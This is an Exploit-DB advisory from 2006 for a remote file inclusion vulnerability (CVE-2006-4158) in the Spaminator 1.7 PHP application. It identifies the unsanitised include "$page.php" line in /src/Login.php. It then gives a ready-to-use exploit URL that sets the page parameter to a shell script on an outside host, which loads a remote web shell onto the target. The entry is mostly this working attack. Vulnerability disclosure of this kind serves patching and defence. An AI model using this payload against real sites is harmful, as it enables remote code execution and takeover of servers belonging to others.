Spaminator <= 1.7 page Remote File Include Vulnerability

2006-08-10T00:00:00
ID EDB-ID:2165
Type exploitdb
Reporter Drago84
Modified 2006-08-10T00:00:00

Description

Spaminator <= 1.7 (page) Remote File Include Vulnerability. CVE-2006-4158. Webapps exploit for php platform

                                        
                                            Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke

# milw0rm.com [2006-08-10]